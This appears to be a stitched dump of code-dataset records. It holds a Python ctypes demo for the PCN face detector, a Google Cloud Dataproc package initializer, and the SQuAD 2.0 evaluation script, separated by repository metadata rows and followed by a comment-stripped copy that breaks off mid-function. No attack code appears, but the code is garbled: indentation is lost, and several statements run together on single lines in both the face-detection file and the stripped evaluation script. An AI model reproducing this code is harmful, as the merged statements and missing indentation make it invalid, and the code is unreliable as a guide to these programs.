class CPoint(Structure):
_fields_ = [("x", c_int),
("y", c_int)]
FEAT_POINTS = 14
class CWindow(Structure):
_fields_ = [("x", c_int),
("y", c_int),
("width", c_int),
("angle", c_int),
("score", c_float),
("points",CPoint*FEAT_POINTS)]
class FeatEnam(IntEnum):
CHIN_0 = 0
CHIN_1 = 1
CHIN_2 = 2
CHIN_3 = 3
CHIN_4 = 4
CHIN_5 = 5
CHIN_6 = 6
CHIN_7 = 7
CHIN_8 = 8
NOSE = 9
EYE_LEFT = 10
EYE_RIGHT = 11
MOUTH_LEFT = 12
MOUTH_RIGHT = 13
FEAT_POINTS = 14
lib = CDLL("/usr/local/lib/libPCN.so")
init_detector = lib.init_detector
init_detector.argtypes = [
c_char_p, c_char_p, c_char_p,
c_char_p, c_char_p, c_char_p,
c_int,c_float,c_float,c_float,
c_float,c_int,c_float,c_int]
init_detector.restype = c_void_p
detect_faces = lib.detect_faces
detect_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_faces.restype = POINTER(CWindow)
detect_track_faces = lib.detect_track_faces
detect_track_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_track_faces.restype = POINTER(CWindow)
free_faces = lib.free_faces
free_faces.argtypes= [c_void_p]
free_detector = lib.free_detector
free_detector.argtypes= [c_void_p]
CYAN=(255,255,0)
BLUE=(255,0,0)
RED=(0,0,255)
GREEN=(0,255,0)
YELLOW=(0,255,255)
def DrawFace(win,img):
width = 2
x1 = win.x
y1 = win.y
x2 = win.width + win.x - 1
y2 = win.width + win.y - 1
centerX = (x1 + x2) / 2
centerY = (y1 + y2) / 2
angle = win.angle
R = cv2.getRotationMatrix2D((centerX,centerY),angle,1)
pts = np.array([[x1,y1,1],[x1,y2,1],[x2,y2,1],[x2,y1,1]], np.int32)
pts = (pts @ R.T).astype(int) pts = pts.reshape((-1,1,2))
cv2.polylines(img,[pts],True,CYAN,width)
cv2.line(img, (pts[0][0][0],pts[0][0][1]), (pts[3][0][0],pts[3][0][1]), BLUE, width)
def DrawPoints(win,img):
width = 2
f = FeatEnam.NOSE
cv2.circle(img,(win.points[f].x,win.points[f].y),width,GREEN,-1)
f = FeatEnam.EYE_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.EYE_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.MOUTH_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
f = FeatEnam.MOUTH_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
for i in range(8):
cv2.circle(img,(win.points[i].x,win.points[i].y),width,BLUE,-1)
def SetThreadCount(threads):
os.environ['OMP_NUM_THREADS'] = str(threads)
def c_str(str_in):
return c_char_p(str_in.encode('utf-8'))
video_flag = 0
if __name__=="__main__":
SetThreadCount(1)
path = '/usr/local/share/pcn/'
detection_model_path = c_str(path + "PCN.caffemodel")
pcn1_proto = c_str(path + "PCN-1.prototxt")
pcn2_proto = c_str(path + "PCN-2.prototxt")
pcn3_proto = c_str(path + "PCN-3.prototxt")
tracking_model_path = c_str(path + "PCN-Tracking.caffemodel")
tracking_proto = c_str(path + "PCN-Tracking.prototxt")
if video_flag:
cap = cv2.VideoCapture(0)
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,1)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
fps = cap.get(cv2.CAP_PROP_FPS)
while cap.isOpened():
ret, frame = cap.read()
if ret == False:
break
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_track_faces(detector, raw_data,
int(height), int(width),
pointer(face_count))
end = time.time()
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
fps = int(1 / (end - start))
cv2.putText(frame, str(fps) + "fps", (20, 45), 4, 1, (0, 0, 125))
cv2.imshow('PCN', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,0)
for i in range(1, 27):
frame = cv2.imread("imgs/" + str(i) + ".jpg")
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_faces(detector, raw_data,
frame.shape[0], frame.shape[1],
pointer(face_count))
end = time.time()
print(i, end - start, "s")
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
cv2.imshow('PCN', frame)
cv2.waitKey()
free_detector(detector)
| true
| true
|
f707c5fad6d4f32d6fa459e9433bae461f6298ac
| 1,049
|
py
|
Python
|
dataproc/google/cloud/dataproc.py
|
erikwebb/google-cloud-python
|
288a878e9a07239015c78a193eca1cc15e926127
|
[
"Apache-2.0"
] | 1
|
2019-04-16T08:13:06.000Z
|
2019-04-16T08:13:06.000Z
|
dataproc/google/cloud/dataproc.py
|
erikwebb/google-cloud-python
|
288a878e9a07239015c78a193eca1cc15e926127
|
[
"Apache-2.0"
] | null | null | null |
dataproc/google/cloud/dataproc.py
|
erikwebb/google-cloud-python
|
288a878e9a07239015c78a193eca1cc15e926127
|
[
"Apache-2.0"
] | 1
|
2020-11-15T11:44:36.000Z
|
2020-11-15T11:44:36.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from google.cloud.dataproc_v1 import ClusterControllerClient
from google.cloud.dataproc_v1 import JobControllerClient
from google.cloud.dataproc_v1 import WorkflowTemplateServiceClient
from google.cloud.dataproc_v1 import enums
from google.cloud.dataproc_v1 import types
__all__ = (
"enums",
"types",
"ClusterControllerClient",
"JobControllerClient",
"WorkflowTemplateServiceClient",
)
| 32.78125
| 74
| 0.775024
|
from __future__ import absolute_import
from google.cloud.dataproc_v1 import ClusterControllerClient
from google.cloud.dataproc_v1 import JobControllerClient
from google.cloud.dataproc_v1 import WorkflowTemplateServiceClient
from google.cloud.dataproc_v1 import enums
from google.cloud.dataproc_v1 import types
__all__ = (
"enums",
"types",
"ClusterControllerClient",
"JobControllerClient",
"WorkflowTemplateServiceClient",
)
| true
| true
|
f707c6154d1287ce9821836e38935dafa47e3ce9
| 13,454
|
py
|
Python
|
examples/evaluate.py
|
Nstats/cs_capsule
|
e45a8518a41117d4b5f105bcc2c96a3d621e40ea
|
[
"Apache-2.0"
] | 1
|
2020-05-25T16:17:47.000Z
|
2020-05-25T16:17:47.000Z
|
examples/evaluate.py
|
Nstats/cs_capsule
|
e45a8518a41117d4b5f105bcc2c96a3d621e40ea
|
[
"Apache-2.0"
] | null | null | null |
examples/evaluate.py
|
Nstats/cs_capsule
|
e45a8518a41117d4b5f105bcc2c96a3d621e40ea
|
[
"Apache-2.0"
] | null | null | null |
#*#*#*./examples/evaluate.py
"""Official evaluation script for SQuAD version 2.0.
In addition to basic functionality, we also compute additional statistics and
plot precision-recall curves if an additional na_prob.json file is provided.
This file is expected to map question ID's to the model's predicted probability
that a question is unanswerable.
"""
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
OPTS = None
def parse_args():
parser = argparse.ArgumentParser('Official evaluation script for SQuAD version 2.0.')
parser.add_argument('data_file', metavar='data.json', help='Input data JSON file.')
parser.add_argument('pred_file', metavar='pred.json', help='Model predictions.')
parser.add_argument('--out-file', '-o', metavar='eval.json',
help='Write accuracy metrics to file (default is stdout).')
parser.add_argument('--na-prob-file', '-n', metavar='na_prob.json',
help='Model estimates of probability of no answer.')
parser.add_argument('--na-prob-thresh', '-t', type=float, default=1.0,
help='Predict "" if no-answer probability exceeds this (default = 1.0).')
parser.add_argument('--out-image-dir', '-p', metavar='out_images', default=None,
help='Save precision-recall curves to directory.')
parser.add_argument('--verbose', '-v', action='store_true')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def make_qid_to_has_ans(dataset):
qid_to_has_ans = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid_to_has_ans[qa['id']] = bool(qa['answers'])
return qid_to_has_ans
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
regex = re.compile(r'\b(a|an|the)\b', re.UNICODE)
return re.sub(regex, ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def get_tokens(s):
if not s: return []
return normalize_answer(s).split()
def compute_exact(a_gold, a_pred):
return int(normalize_answer(a_gold) == normalize_answer(a_pred))
def compute_f1(a_gold, a_pred):
gold_toks = get_tokens(a_gold) #答案list
pred_toks = get_tokens(a_pred)
common = collections.Counter(gold_toks) & collections.Counter(pred_toks)###c.Counter([1,2,33])& c.Counter([2,3,4]) res: Counter({2: 1})
num_same = sum(common.values()) ###所有出现的相同词的总个数
if len(gold_toks) == 0 or len(pred_toks) == 0: ##无答案问题直接对比
# If either is no-answer, then F1 is 1 if they agree, 0 otherwise
return int(gold_toks == pred_toks)
if num_same == 0:
return 0
precision = 1.0 * num_same / len(pred_toks) #准确率
recall = 1.0 * num_same / len(gold_toks) #召回率
f1 = (2 * precision * recall) / (precision + recall) #f1
return f1
def get_raw_scores(dataset, preds):
exact_scores = {}
f1_scores = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid = qa['id']
gold_answers = [a['text'] for a in qa['answers']
if normalize_answer(a['text'])]
if not gold_answers:
# For unanswerable questions, only correct answer is empty string
gold_answers = ['']
if qid not in preds:
print('Missing prediction for %s' % qid)
continue
a_pred = preds[qid]
# Take max over all gold answers
exact_scores[qid] = max(compute_exact(a, a_pred) for a in gold_answers)
f1_scores[qid] = max(compute_f1(a, a_pred) for a in gold_answers)
return exact_scores, f1_scores
def apply_no_ans_threshold(scores, na_probs, qid_to_has_ans, na_prob_thresh):
new_scores = {}
for qid, s in scores.items():
pred_na = na_probs[qid] > na_prob_thresh ##有答案变成了无答案的情况
if pred_na:
new_scores[qid] = float(not qid_to_has_ans[qid])
else:
new_scores[qid] = s
return new_scores
def make_eval_dict(exact_scores, f1_scores, qid_list=None):
if not qid_list:
total = len(exact_scores)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores.values()) / total),
('f1', 100.0 * sum(f1_scores.values()) / total),
('total', total),
])
else:
total = len(qid_list)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores[k] for k in qid_list) / total),
('f1', 100.0 * sum(f1_scores[k] for k in qid_list) / total),
('total', total),
])
def merge_eval(main_eval, new_eval, prefix):
for k in new_eval:
main_eval['%s_%s' % (prefix, k)] = new_eval[k]
def plot_pr_curve(precisions, recalls, out_image, title):
plt.step(recalls, precisions, color='b', alpha=0.2, where='post')
plt.fill_between(recalls, precisions, step='post', alpha=0.2, color='b')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.xlim([0.0, 1.05])
plt.ylim([0.0, 1.05])
plt.title(title)
plt.savefig(out_image)
plt.clf()
def make_precision_recall_eval(scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=None, title=None):
qid_list = sorted(na_probs, key=lambda k: na_probs[k])
true_pos = 0.0
cur_p = 1.0
cur_r = 0.0
precisions = [1.0]
recalls = [0.0]
avg_prec = 0.0
for i, qid in enumerate(qid_list):
if qid_to_has_ans[qid]:
true_pos += scores[qid]
cur_p = true_pos / float(i+1)
cur_r = true_pos / float(num_true_pos)
if i == len(qid_list) - 1 or na_probs[qid] != na_probs[qid_list[i+1]]:
# i.e., if we can put a threshold after this point
avg_prec += cur_p * (cur_r - recalls[-1])
precisions.append(cur_p)
recalls.append(cur_r)
if out_image:
plot_pr_curve(precisions, recalls, out_image, title)
return {'ap': 100.0 * avg_prec}
def run_precision_recall_analysis(main_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir):
if out_image_dir and not os.path.exists(out_image_dir):
os.makedirs(out_image_dir)
num_true_pos = sum(1 for v in qid_to_has_ans.values() if v)
if num_true_pos == 0:
return
pr_exact = make_precision_recall_eval(
exact_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_exact.png'),
title='Precision-Recall curve for Exact Match score')
pr_f1 = make_precision_recall_eval(
f1_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_f1.png'),
title='Precision-Recall curve for F1 score')
oracle_scores = {k: float(v) for k, v in qid_to_has_ans.items()}
pr_oracle = make_precision_recall_eval(
oracle_scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_oracle.png'),
title='Oracle Precision-Recall curve (binary task of HasAns vs. NoAns)')
merge_eval(main_eval, pr_exact, 'pr_exact')
merge_eval(main_eval, pr_f1, 'pr_f1')
merge_eval(main_eval, pr_oracle, 'pr_oracle')
def histogram_na_prob(na_probs, qid_list, image_dir, name):
if not qid_list:
return
x = [na_probs[k] for k in qid_list]
weights = np.ones_like(x) / float(len(x))
plt.hist(x, weights=weights, bins=20, range=(0.0, 1.0))
plt.xlabel('Model probability of no-answer')
plt.ylabel('Proportion of dataset')
plt.title('Histogram of no-answer probability: %s' % name)
plt.savefig(os.path.join(image_dir, 'na_prob_hist_%s.png' % name))
plt.clf()
def find_best_thresh(preds, scores, na_probs, qid_to_has_ans):
num_no_ans = sum(1 for k in qid_to_has_ans if not qid_to_has_ans[k])
cur_score = num_no_ans
best_score = cur_score
best_thresh = 0.0
qid_list = sorted(na_probs, key=lambda k: na_probs[k]) #从小到大按照diff排序
for i, qid in enumerate(qid_list):
if qid not in scores: continue
if qid_to_has_ans[qid]:
diff = scores[qid]
else:
if preds[qid]:
diff = -1
else:
diff = 0
cur_score += diff
if cur_score > best_score:
best_score = cur_score
best_thresh = na_probs[qid]
return 100.0 * best_score / len(scores), best_thresh
def find_all_best_thresh(main_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans):
best_exact, exact_thresh = find_best_thresh(preds, exact_raw, na_probs, qid_to_has_ans)
best_f1, f1_thresh = find_best_thresh(preds, f1_raw, na_probs, qid_to_has_ans)
main_eval['best_exact'] = best_exact
main_eval['best_exact_thresh'] = exact_thresh
main_eval['best_f1'] = best_f1
main_eval['best_f1_thresh'] = f1_thresh
def main():
with open(OPTS.data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(OPTS.pred_file) as f:
preds = json.load(f)
if OPTS.na_prob_file:
with open(OPTS.na_prob_file) as f:
na_probs = json.load(f)
else:
na_probs = {k: 0.0 for k in preds}
qid_to_has_ans = make_qid_to_has_ans(dataset) # maps qid to True/False
has_ans_qids = [k for k, v in qid_to_has_ans.items() if v]
no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v]
exact_raw, f1_raw = get_raw_scores(dataset, preds) #得到每个答案的extract和f1 list
exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
if OPTS.na_prob_file:
find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans)
if OPTS.na_prob_file and OPTS.out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, OPTS.out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, OPTS.out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, OPTS.out_image_dir, 'noAns')
if OPTS.out_file:
with open(OPTS.out_file, 'w') as f:
json.dump(out_eval, f)
else:
print(json.dumps(out_eval, indent=2))
def judgeOnline(data_file,pred_file,na_prob_file,output_dir,epoch,train_steps):
if not os.path.exists(os.path.join(output_dir,"eval_res")):
os.makedirs(os.path.join(output_dir,"eval_res"))
output = os.path.join(output_dir,"eval_res")
out_file = os.path.join(output,"eval.json")
out_image_dir = None
na_prob_thresh = 1.0
with open(data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(pred_file) as f:
preds = json.load(f)
with open(na_prob_file) as f:
na_probs = json.load(f)
exact_raw, f1_raw = get_raw_scores(dataset, preds)
qid_to_has_ans = make_qid_to_has_ans(dataset) # maps qid to True/False 区分dev中的有无答案
has_ans_qids = [k for k, v in qid_to_has_ans.items() if v] #有答案的问题
no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v] #无答案的问题
exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
na_prob_thresh)###这里没用因为默认的是1.0 详情可参考该函数
f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
na_prob_thresh)###这里没用因为默认的是1.0 详情可参考该函数
out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
if na_prob_file: ##如果给出null_odds.json文件
find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans) ##获取最好的thresh
if na_prob_file and out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, out_image_dir, 'noAns')
if out_file:
with open(out_file, 'a') as fout:
fout.write("epoch:{} steps:{} evaluation res:{}\n".format(epoch,train_steps,json.dumps(out_eval, sort_keys=True, indent=2)))
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO )
logger.info("write evaluation result to " + out_file + "OK!")
else:
print(json.dumps(out_eval, indent=2))
return out_eval
if __name__ == '__main__':
OPTS = parse_args()
if OPTS.out_image_dir:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
print(vars(OPTS))
main()
| 39.922849
| 138
| 0.676081
|
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
OPTS = None
def parse_args():
parser = argparse.ArgumentParser('Official evaluation script for SQuAD version 2.0.')
parser.add_argument('data_file', metavar='data.json', help='Input data JSON file.')
parser.add_argument('pred_file', metavar='pred.json', help='Model predictions.')
parser.add_argument('--out-file', '-o', metavar='eval.json',
help='Write accuracy metrics to file (default is stdout).')
parser.add_argument('--na-prob-file', '-n', metavar='na_prob.json',
help='Model estimates of probability of no answer.')
parser.add_argument('--na-prob-thresh', '-t', type=float, default=1.0,
help='Predict "" if no-answer probability exceeds this (default = 1.0).')
parser.add_argument('--out-image-dir', '-p', metavar='out_images', default=None,
help='Save precision-recall curves to directory.')
parser.add_argument('--verbose', '-v', action='store_true')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def make_qid_to_has_ans(dataset):
qid_to_has_ans = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid_to_has_ans[qa['id']] = bool(qa['answers'])
return qid_to_has_ans
def normalize_answer(s):
def remove_articles(text):
regex = re.compile(r'\b(a|an|the)\b', re.UNICODE)
return re.sub(regex, ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def get_tokens(s):
if not s: return []
return normalize_answer(s).split()
def compute_exact(a_gold, a_pred):
return int(normalize_answer(a_gold) == normalize_answer(a_pred))
def compute_f1(a_gold, a_pred):
gold_toks = get_tokens(a_gold) pred_toks = get_tokens(a_pred)
common = collections.Counter(gold_toks) & collections.Counter(pred_toks) num_same = sum(common.values()) if len(gold_toks) == 0 or len(pred_toks) == 0: return int(gold_toks == pred_toks)
if num_same == 0:
return 0
precision = 1.0 * num_same / len(pred_toks) recall = 1.0 * num_same / len(gold_toks) f1 = (2 * precision * recall) / (precision + recall) return f1
def get_raw_scores(dataset, preds):
exact_scores = {}
f1_scores = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid = qa['id']
gold_answers = [a['text'] for a in qa['answers']
if normalize_answer(a['text'])]
if not gold_answers:
gold_answers = ['']
if qid not in preds:
print('Missing prediction for %s' % qid)
continue
a_pred = preds[qid]
exact_scores[qid] = max(compute_exact(a, a_pred) for a in gold_answers)
f1_scores[qid] = max(compute_f1(a, a_pred) for a in gold_answers)
return exact_scores, f1_scores
def apply_no_ans_threshold(scores, na_probs, qid_to_has_ans, na_prob_thresh):
new_scores = {}
for qid, s in scores.items():
pred_na = na_probs[qid] > na_prob_thresh if pred_na:
new_scores[qid] = float(not qid_to_has_ans[qid])
else:
new_scores[qid] = s
return new_scores
def make_eval_dict(exact_scores, f1_scores, qid_list=None):
if not qid_list:
total = len(exact_scores)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores.values()) / total),
('f1', 100.0 * sum(f1_scores.values()) / total),
('total', total),
])
else:
total = len(qid_list)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores[k] for k in qid_list) / total),
('f1', 100.0 * sum(f1_scores[k] for k in qid_list) / total),
('total', total),
])
def merge_eval(main_eval, new_eval, prefix):
for k in new_eval:
main_eval['%s_%s' % (prefix, k)] = new_eval[k]
def plot_pr_curve(precisions, recalls, out_image, title):
plt.step(recalls, precisions, color='b', alpha=0.2, where='post')
plt.fill_between(recalls, precisions, step='post', alpha=0.2, color='b')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.xlim([0.0, 1.05])
plt.ylim([0.0, 1.05])
plt.title(title)
plt.savefig(out_image)
plt.clf()
def make_precision_recall_eval(scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=None, title=None):
qid_list = sorted(na_probs, key=lambda k: na_probs[k])
true_pos = 0.0
cur_p = 1.0
cur_r = 0.0
precisions = [1.0]
recalls = [0.0]
avg_prec = 0.0
for i, qid in enumerate(qid_list):
if qid_to_has_ans[qid]:
true_pos += scores[qid]
cur_p = true_pos / float(i+1)
cur_r = true_pos / float(num_true_pos)
if i == len(qid_list) - 1 or na_probs[qid] != na_probs[qid_list[i+1]]:
avg_prec += cur_p * (cur_r - recalls[-1])
precisions.append(cur_p)
recalls.append(cur_r)
if out_image:
plot_pr_curve(precisions, recalls, out_image, title)
return {'ap': 100.0 * avg_prec}
def run_precision_recall_analysis(main_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir):
if out_image_dir and not os.path.exists(out_image_dir):
os.makedirs(out_image_dir)
num_true_pos = sum(1 for v in qid_to_has_ans.values() if v)
if num_true_pos == 0:
return
pr_exact = make_precision_recall_eval(
exact_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_exact.png'),
title='Precision-Recall curve for Exact Match score')
pr_f1 = make_precision_recall_eval(
f1_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_f1.png'),
title='Precision-Recall curve for F1 score')
oracle_scores = {k: float(v) for k, v in qid_to_has_ans.items()}
pr_oracle = make_precision_recall_eval(
oracle_scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_oracle.png'),
title='Oracle Precision-Recall curve (binary task of HasAns vs. NoAns)')
merge_eval(main_eval, pr_exact, 'pr_exact')
merge_eval(main_eval, pr_f1, 'pr_f1')
merge_eval(main_eval, pr_oracle, 'pr_oracle')
def histogram_na_prob(na_probs, qid_list, image_dir, name):
if not qid_list:
return
x = [na_probs[k] for k in qid_list]
weights = np.ones_like(x) / float(len(x))
plt.hist(x, weights=weights, bins=20, range=(0.0, 1.0))
plt.xlabel('Model probability of no-answer')
plt.ylabel('Proportion of dataset')
plt.title('Histogram of no-answer probability: %s' % name)
plt.savefig(os.path.join(image_dir, 'na_prob_hist_%s.png' % name))
plt.clf()
def find_best_thresh(preds, scores, na_probs, qid_to_has_ans):
num_no_ans = sum(1 for k in qid_to_has_ans if not qid_to_has_ans[k])
cur_score = num_no_ans
best_score = cur_score
best_thresh = 0.0
qid_list = sorted(na_probs, key=lambda k: na_probs[k]) for i, qid in enumerate(qid_list):
if qid not in scores: continue
if qid_to_has_ans[qid]:
diff = scores[qid]
else:
if preds[qid]:
diff = -1
else:
diff = 0
cur_score += diff
if cur_score > best_score:
best_score = cur_score
best_thresh = na_probs[qid]
return 100.0 * best_score / len(scores), best_thresh
def find_all_best_thresh(main_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans):
best_exact, exact_thresh = find_best_thresh(preds, exact_raw, na_probs, qid_to_has_ans)
best_f1, f1_thresh = find_best_thresh(preds, f1_raw, na_probs, qid_to_has_ans)
main_eval['best_exact'] = best_exact
main_eval['best_exact_thresh'] = exact_thresh
main_eval['best_f1'] = best_f1
main_eval['best_f1_thresh'] = f1_thresh
def main():
with open(OPTS.data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(OPTS.pred_file) as f:
preds = json.load(f)
if OPTS.na_prob_file:
with open(OPTS.na_prob_file) as f:
na_probs = json.load(f)
else:
na_probs = {k: 0.0 for k in preds}
qid_to_has_ans = make_qid_to_has_ans(dataset) has_ans_qids = [k for k, v in qid_to_has_ans.items() if v]
no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v]
exact_raw, f1_raw = get_raw_scores(dataset, preds) exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
if OPTS.na_prob_file:
find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans)
if OPTS.na_prob_file and OPTS.out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, OPTS.out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, OPTS.out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, OPTS.out_image_dir, 'noAns')
if OPTS.out_file:
with open(OPTS.out_file, 'w') as f:
json.dump(out_eval, f)
else:
print(json.dumps(out_eval, indent=2))
def judgeOnline(data_file,pred_file,na_prob_file,output_dir,epoch,train_steps):
if not os.path.exists(os.path.join(output_dir,"eval_res")):
os.makedirs(os.path.join(output_dir,"eval_res"))
output = os.path.join(output_dir,"eval_res")
out_file = os.path.join(output,"eval.json")
out_image_dir = None
na_prob_thresh = 1.0
with open(data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(pred_file) as f:
preds = json.load(f)
with open(na_prob_file) as f:
na_probs = json.load(f)
exact_raw, f1_raw = get_raw_scores(dataset, preds)
qid_to_has_ans = make_qid_to_has_ans(dataset) has_ans_qids = [k for k, v in qid_to_has_ans.items() if v] no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v] exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
na_prob_thresh) f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
na_prob_thresh) out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
if na_prob_file: find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans) if na_prob_file and out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, out_image_dir, 'noAns')
if out_file:
with open(out_file, 'a') as fout:
